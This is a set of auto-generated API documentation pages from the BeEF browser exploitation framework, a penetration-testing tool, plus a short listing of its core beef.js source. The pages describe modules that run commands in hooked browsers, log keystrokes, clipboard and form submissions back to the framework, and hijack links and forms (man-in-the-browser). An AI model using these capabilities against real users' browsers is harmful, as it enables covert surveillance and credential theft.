<h4 class="name" id=".isMobileDevice"><span class="type-signature">(static) </span>isMobileDevice<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Returns true if the browser is on a Mobile device</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line253">line 253</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
<h4 class="name" id=".isMotorola"><span class="type-signature">(static) </span>isMotorola<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Is Motorola?</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line235">line 235</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
<h4 class="name" id=".isNokia"><span class="type-signature">(static) </span>isNokia<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Is Nokia?</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line203">line 203</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
<h4 class="name" id=".isTouchEnabled"><span class="type-signature">(static) </span>isTouchEnabled<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Is touch enabled?</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line162">line 162</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
<h4 class="name" id=".isVirtualMachine"><span class="type-signature">(static) </span>isVirtualMachine<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Is virtual machine?</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line171">line 171</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
<h4 class="name" id=".isZune"><span class="type-signature">(static) </span>isZune<span class="signature">()</span><span class="type-signature"> → {Boolean}</span></h4>
<div class="description">
<p>Is Zune?</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="hardware.js.html">hardware.js</a>, <a href="hardware.js.html#line211">line 211</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true or false.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Boolean</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.init.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: init</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: init</h1>
<section>
<header>
<h2>init</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Contains the beef_init() method which starts the BeEF client-side
logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.</p>
<p>If beef.pageIsLoaded is true, then this JS has been loaded >1 times
and will have a new session id. The new session id will need to know
the brwoser details. So sendback the browser details again.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".beef_init"><span class="type-signature">(static) </span>beef_init<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Starts the polling mechanism, and initialize various components:</p>
<ul>
<li>browser details (see browser.js) are sent back to the "/init" handler</li>
<li>the polling starts (checks for new commands, and execute them)</li>
<li>the logger component is initialized (see logger.js)</li>
<li>the Autorun Engine is initialized (see are.js)</li>
</ul>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line72">line 72</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".window.onclose"><span class="type-signature">(static) </span>window.onclose<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line49">line 49</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".window.onload"><span class="type-signature">(static) </span>window.onload<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line26">line 26</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".window.onpopstate"><span class="type-signature">(static) </span>window.onpopstate<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="init.js.html">init.js</a>, <a href="init.js.html#line32">line 32</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: beef.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: beef.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* BeEF JS Library <%= @beef_version %>
* Register the BeEF JS on the window object.
*/
$j = jQuery.noConflict();
if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
/**
* Register the BeEF JS on the window object.
* @namespace {Object} BeefJS
* @property {string} version BeEf Version
* @property {boolean} pageIsLoaded This gets set to true during window.onload(). It's a useful hack when messing with document.write().
* @property {array} onpopstate An array containing functions to be executed by the window.onpopstate() method.
* @property {array} onclose An array containing functions to be executed by the window.onclose() method.
* @property {array} commands An array containing functions to be executed by Beef.
* @property {array} components An array containing all the BeEF JS components.
*/
var BeefJS = {
version: '<%= @beef_version %>',
pageIsLoaded: false,
onpopstate: new Array(),
onclose: new Array(),
commands: new Array(),
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
isDebug = '<%= @client_debug %>'
if (typeof console == "object" && typeof console.log == "function" && isDebug === '-1') {
var currentdate = new Date();
var pad = function(n){return ("0" + n).slice(-2);}
var datetime = currentdate.getFullYear() + "-"
+ pad(currentdate.getMonth()+1) + "-"
+ pad(currentdate.getDate()) + " "
+ pad(currentdate.getHours()) + ":"
+ pad(currentdate.getMinutes()) + ":"
+ pad(currentdate.getSeconds());
console.log('['+datetime+'] '+msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.
*/
execute: function(fn) {
if ( typeof beef.websocket == "undefined"){
this.commands.push(fn);
}else{
fn();
}
},
/**
* Registers a component in BeEF JS.
* @params: {String} the component.
*
* Components are very important to register so the framework does not
* send them back over and over again.
*/
regCmp: function(component) {
this.components.push(component);
}
};
window.beef = BeefJS;
}
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.logger.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: logger</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: logger</h1>
<section>
<header>
<h2>logger</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides logging capabilities.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Members</h3>
<h4 class="name" id=".events"><span class="type-signature">(static) </span>events<span class="type-signature"></span></h4>
<div class="description">
<p>Holds events created by user, to be sent back to BeEF</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line21">line 21</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".id"><span class="type-signature">(static) </span>id<span class="type-signature"></span></h4>
<div class="description">
<p>Internal logger id</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line17">line 17</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".in_submit"><span class="type-signature">(static) </span>in_submit<span class="type-signature"></span></h4>
<div class="description">
<p>Prevents from recursive event handling on form submission</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line50">line 50</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".stream"><span class="type-signature">(static) </span>stream<span class="type-signature"></span></h4>
<div class="description">
<p>Holds current stream of key presses</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line25">line 25</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".target"><span class="type-signature">(static) </span>target<span class="type-signature"></span></h4>
<div class="description">
<p>Contains current target of key presses</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line29">line 29</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".time"><span class="type-signature">(static) </span>time<span class="type-signature"></span></h4>
<div class="description">
<p>Holds the time the logger was started</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line33">line 33</a>
</li></ul></dd>
</dl>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".click"><span class="type-signature">(static) </span>click<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Click function fires when the user clicks the mouse.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line155">line 155</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".console"><span class="type-signature">(static) </span>console<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Console function fires when data is sent to the browser console.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line222">line 222</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".copy"><span class="type-signature">(static) </span>copy<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Copy function fires when the user copies data to the clipboard.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line198">line 198</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".cut"><span class="type-signature">(static) </span>cut<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Cut function fires when the user cuts data to the clipboard.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line210">line 210</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".e"><span class="type-signature">(static) </span>e<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Holds the event details to be sent to BeEF</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line37">line 37</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".get_dom_identifier"><span class="type-signature">(static) </span>get_dom_identifier<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Translate DOM Object to a readable string</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line296">line 296</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".get_id"><span class="type-signature">(static) </span>get_id<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Get id</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line147">line 147</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".get_timestamp"><span class="type-signature">(static) </span>get_timestamp<span class="signature">()</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Formats the timestamp</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line312">line 312</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>timestamp string</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".keypress"><span class="type-signature">(static) </span>keypress<span class="signature">(e:)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Keypress function fires everytime a key is pressed.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>e:</code></td>
<td class="type">
<span class="param-type">Object</span>
</td>
<td class="description last"><p>event object</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line186">line 186</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".parse_stream"><span class="type-signature">(static) </span>parse_stream<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Parses stream array and creates history string</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line320">line 320</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".paste"><span class="type-signature">(static) </span>paste<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Paste function fires when the user pastes data from the clipboard.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line234">line 234</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".push_stream"><span class="type-signature">(static) </span>push_stream<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Pushes the current stream to the events queue</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line285">line 285</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".queue"><span class="type-signature">(static) </span>queue<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Queue results to be sent back to framework</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line350">line 350</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".start"><span class="type-signature">(static) </span>start<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Starts the logger</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line55">line 55</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".stop"><span class="type-signature">(static) </span>stop<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Stops the logger</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line130">line 130</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".submit"><span class="type-signature">(static) </span>submit<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Submit function fires whenever a form is submitted
TODO: Cleanup this function</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line247">line 247</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".win_blur"><span class="type-signature">(static) </span>win_blur<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Fires when the window element has lost focus</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line176">line 176</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".win_focus"><span class="type-signature">(static) </span>win_focus<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Fires when the window element has regained focus</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="logger.js.html">logger.js</a>, <a href="logger.js.html#line167">line 167</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.mitb.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: mitb</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: mitb</h1>
<section>
<header>
<h2>mitb</h2>
</header>
<article>
<div class="container-overview">
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".endSession"><span class="type-signature">(static) </span>endSession<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Signals the Framework that the user has lost the hook</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line241">line 241</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".fetch"><span class="type-signature">(static) </span>fetch<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Fetches a hooked link with AJAX</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line181">line 181</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".fetchForm"><span class="type-signature">(static) </span>fetchForm<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Fetches a hooked form with AJAX</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line161">line 161</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".fetchOnclick"><span class="type-signature">(static) </span>fetchOnclick<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Fetches a window.location=http://domainname.com and setting up history</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line202">line 202</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hook"><span class="type-signature">(static) </span>hook<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Initializes the hook on anchors and forms.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line68">line 68</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".init"><span class="type-signature">(static) </span>init<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Initializes</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line16">line 16</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".poisonAnchor"><span class="type-signature">(static) </span>poisonAnchor<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Hooks anchors and prevents them from linking away</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line99">line 99</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".poisonForm"><span class="type-signature">(static) </span>poisonForm<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Hooks forms and prevents them from linking away</p>
</div>
<dl class="details">
